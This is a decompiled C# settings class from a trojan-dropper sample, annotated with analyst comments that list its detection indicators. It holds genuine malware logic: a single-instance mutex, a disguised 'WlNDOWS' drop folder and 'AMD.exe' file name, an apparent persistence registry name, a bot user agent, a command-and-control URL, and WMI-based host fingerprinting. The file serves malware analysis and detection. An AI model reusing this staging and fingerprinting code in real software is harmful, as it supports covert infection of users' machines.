MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc/Base_Settings.cs

// Decompiled with JetBrains decompiler
// Type: Poly.Base_Settings
// Assembly: Poly, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 618F3010-979B-4F78-8F99-D5C35E30AA2E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Sysn.bshb-a13f90b28df8b73652beb4c3c95ff1b8dc0c2fc41dee8f7d6acdd43828a0aadc.exe
using System;
using System.Diagnostics;
using System.Management;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
namespace Poly
{
/// <summary>
/// Process-wide configuration and host-fingerprint state for the decompiled "Poly" assembly.
/// Everything except the mutex handle is a mutable public static field, so any type in the
/// assembly can read or overwrite it.
/// </summary>
/// <remarks>
/// Analyst notes: the string literals below are the sample's hard-coded indicators and are
/// usable for host and network detection as-is: mutex name "0x110110xx", file name "AMD.exe",
/// folder "\WlNDOWS\" under the local application-data directory, the name
/// "Windows Pointer Driver", user agent "s00tb0t" and the URL in <c>httpURL</c>.
/// This file only stores these values; the code that writes files, touches the registry or
/// makes HTTP requests is not in this file.
/// </remarks>
public class Base_Settings
{
// Same numeric value that GetLocale() passes to API.GetInfo (4098).
private const uint LOCALE_SENGCOUNTRY = 4098;
// Not read anywhere in this file; presumably consumed by an installer routine elsewhere - confirm.
public static bool install = true;
// Result of the most recent MutexRunning() probe made by Initialise().
public static bool mutexRunning;
public static bool captured;
// Set by populateEnvVar() from getAdminStatus().
public static bool isAdmin;
public static bool busy = false;
// Name of the named mutex used as the single-instance marker (host-based indicator).
public static string mutex0 = "0x110110xx";
// Set by populateEnvVar() to AppDataLocal + FolderName.
public static string filePath;
// Executable name that isExePath() expects under filePath.
public static string fileName = "AMD.exe";
public static string AppDataRoam;
public static string AppDataLocal;
// The second character is a lowercase 'L', not an uppercase 'I': a look-alike of "WINDOWS".
public static string FolderName = "\\WlNDOWS\\";
// NOTE(review): presumably a registry value name used for persistence; its use is not in this file.
public static string regName = "Windows Pointer Driver";
// NOTE(review): presumably sent as the HTTP User-Agent header; the request code is not in this file.
public static string userAgent = "s00tb0t";
// NOTE(review): presumably the remote endpoint the sample contacts; plain http, no TLS in the literal.
public static string httpURL = "http://www.chr0me.com/about.php";
// Written by Initialise(): "Mutex detected" or "updated".
public static string status;
// The four fields below are filled by populateEnvVar() and DetectOS().
public static string pcName;
public static string hwid;
public static string os;
public static string[] response;
public static string command;
public static int mode = 0;
// Units are not shown in this file.
public static int interval = 40;
// Handle obtained by MutexRunning(): either the opened existing mutex or a newly created one.
private Mutex mutex;
// Loop flag for Initialise(); it is static, so once cleared later Initialise() calls skip the loop.
public static bool wait = true;
/// <summary>
/// Polls for the named mutex and, once it is absent, claims it and collects host information.
/// </summary>
/// <remarks>
/// While the mutex is present the loop sleeps 2 seconds per pass for passes 0 through 5; on the
/// pass where the counter exceeds 5 the process exits with code 0. When the mutex is absent,
/// MutexRunning() has already created it, status becomes "updated", the loop flag is cleared and
/// populateEnvVar() runs. The debug strings written to the console are left in the binary and are
/// additional static-string indicators.
/// </remarks>
public virtual void Initialise()
{
int num = 0;
while (Base_Settings.wait)
{
// The probe runs on every pass, including the pass that ends in Environment.Exit.
Base_Settings.mutexRunning = this.MutexRunning();
if (num > 5)
Environment.Exit(0);
else if (Base_Settings.mutexRunning)
{
Console.WriteLine("Do shit... {0}", (object) num);
Base_Settings.status = "Mutex detected";
Thread.Sleep(2000);
}
// Always true when reached; the explicit condition is a decompiler artefact of a plain else.
else if (!Base_Settings.mutexRunning)
{
Console.WriteLine("Shit done.. Mutex gone");
Base_Settings.status = "updated";
Base_Settings.wait = false;
this.populateEnvVar();
}
++num;
}
}
/// <summary>Empty virtual hook; any behaviour comes from overriding types outside this file.</summary>
public virtual void Run()
{
}
/// <summary>
/// Fills the static host fields: machine name, roaming and local application-data paths,
/// administrator flag, the drop directory path, OS description and hardware-derived id.
/// </summary>
private void populateEnvVar()
{
Base_Settings.pcName = Environment.MachineName;
Base_Settings.AppDataRoam = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
Base_Settings.AppDataLocal = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
Base_Settings.isAdmin = Base_Settings.getAdminStatus();
// Resolves to <LocalApplicationData>\WlNDOWS\ : a per-user path that needs no elevation to write.
Base_Settings.filePath = Base_Settings.AppDataLocal + Base_Settings.FolderName;
this.DetectOS();
Base_Settings.hwid = this.getUniqueID();
Console.WriteLine("Successfully initialised Settings");
// The fingerprint is printed to the console in clear text.
Console.Write("hwid is: {0}\nos is: {1}\n", (object) Base_Settings.hwid, (object) Base_Settings.os);
}
/// <summary>
/// Probes for the named mutex <c>mutex0</c>.
/// </summary>
/// <returns>
/// true when the mutex could be opened; false otherwise, in which case a new mutex with that
/// name is created with initial ownership requested.
/// </returns>
private bool MutexRunning()
{
try
{
// The opened handle is kept in this.mutex and is not released anywhere in this file.
this.mutex = Mutex.OpenExisting(Base_Settings.mutex0);
Console.WriteLine("Mutex Detected");
return true;
}
// Bare catch: any failure to open (not only "does not exist") is treated as "not running".
catch
{
this.mutex = new Mutex(true, Base_Settings.mutex0);
return false;
}
}
/// <summary>
/// Returns true when the current process image path equals filePath + fileName.
/// The comparison is the case-sensitive string operator, and filePath is null until populateEnvVar() has run.
/// </summary>
public static bool isExePath() => !(Process.GetCurrentProcess().MainModule.FileName != Base_Settings.filePath + Base_Settings.fileName);
/// <summary>
/// Returns whether the current Windows identity is in the built-in Administrators role;
/// any exception is swallowed and reported as false.
/// </summary>
public static bool getAdminStatus()
{
try
{
return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
}
catch
{
return false;
}
}
/// <summary>
/// Builds the host id by passing the CPU ProcessorId concatenated with the video controller
/// description to Function.MD5Hash (defined outside this file).
/// </summary>
// NOTE(review): both inputs are hardware description strings, so identical hardware or cloned VMs
// would presumably yield the same id - confirm before using hwid to count distinct hosts.
public string getUniqueID() => Function.MD5Hash((this.getCPUID() + this.getGraphicDevice()).ToString());
/// <summary>
/// Queries WMI (root\CIMV2, Win32_Processor, DeviceID 'CPU0') and returns ProcessorId as a string;
/// returns an empty string when the query yields no rows.
/// </summary>
private string getCPUID()
{
// The searcher and its result collection are never disposed.
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Processor WHERE DeviceID = 'CPU0'");
string empty = string.Empty;
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject["ProcessorId"]);
return empty;
}
/// <summary>
/// Queries WMI (root\CIMV2, Win32_VideoController) and returns the Description of the last row
/// enumerated; returns an empty string when there are no rows.
/// </summary>
private string getGraphicDevice()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController");
string empty = string.Empty;
// Each row overwrites the previous one, so only the last controller contributes to the id.
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject["Description"]);
return empty;
}
/// <summary>
/// Builds the OS description stored in <c>os</c>: a Windows name looked up from
/// major.minor.build, optional service-pack tags, and a "(32-bit)" or "(64-bit)" suffix.
/// </summary>
private void DetectOS()
{
OperatingSystem osVersion = Environment.OSVersion;
// Stays empty when the platform string is not "Win32NT".
string str = "";
if (osVersion.Platform.ToString() == "Win32NT")
{
// The table stops at Windows 7; any build not listed is reported as "Unknown ".
switch (Base_Settings.OSVersionNoRevision(osVersion.Version))
{
case "4.1.2222":
str = "Windows 98 ";
break;
case "4.1.2600":
str = "Windows 98 SE ";
break;
case "4.9.3000":
str = "Windows ME ";
break;
case "5.0.2195":
str = "Windows 2000 ";
break;
case "5.1.2600":
case "5.2.3790":
str = "Windows XP ";
break;
case "6.0.6000":
case "6.0.6001":
case "6.0.6002":
case "6.0.6003":
str = "Windows Vista ";
break;
case "6.1.7600":
case "6.1.7601":
case "6.1.7602":
case "6.1.7603":
str = "Windows 7 ";
break;
default:
str = "Unknown ";
break;
}
}
// Unused local.
string empty = string.Empty;
// API.OSVERSIONINFOEX and API.GetVersionEx are declared outside this file.
API.OSVERSIONINFOEX osVersionInfo = new API.OSVERSIONINFOEX();
osVersionInfo.dwOSVersionInfoSize = Marshal.SizeOf(typeof (API.OSVERSIONINFOEX));
if (API.GetVersionEx(ref osVersionInfo))
{
// The SP2..SP9 checks sit inside the SP1 branch, so none of them run unless "[H_SP1]" matched.
// NOTE(review): the bracketed "[H_SPn]" markers do not look like real szCSDVersion text
// (normally "Service Pack N"); they may be placeholder strings - confirm against the binary.
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP1]"))
{
str += "[SP1]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP2]"))
str += "[SP2]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP3]"))
str += "[SP3]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP4]"))
str += "[SP4]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP5]"))
str += "[SP5]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP6]"))
str += "[SP6]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP7]"))
str += "[SP7]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP8]"))
str += "[SP8]";
if (osVersionInfo.szCSDVersion.ToString().Contains("[H_SP9]"))
str += "[SP9]";
}
Base_Settings.os = !Base_Settings.is64Bit() ? str + "(32-bit)" : str + "(64-bit)";
}
else
// No bitness suffix is appended when GetVersionEx reports failure.
Base_Settings.os = str;
}
/// <summary>Formats a version as "major.minor.build", dropping the revision component.</summary>
private static string OSVersionNoRevision(Version ver) => ver.Major.ToString() + "." + ver.Minor.ToString() + "." + ver.Build.ToString();
/// <summary>Terminates the process with exit code 0; nothing else is cleaned up here.</summary>
public static void cleanUp() => Environment.Exit(0);
/// <summary>
/// Reports 64-bit Windows by checking that the ProgramW6432 environment variable is non-empty;
/// any exception is swallowed and reported as false.
/// </summary>
private static bool is64Bit()
{
try
{
return !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("ProgramW6432"));
}
catch
{
return false;
}
}
/// <summary>
/// Returns API.GetInfo(4098), the value named LOCALE_SENGCOUNTRY in this class;
/// API.GetInfo is declared outside this file.
/// </summary>
public static string GetLocale() => API.GetInfo(4098U);
}
}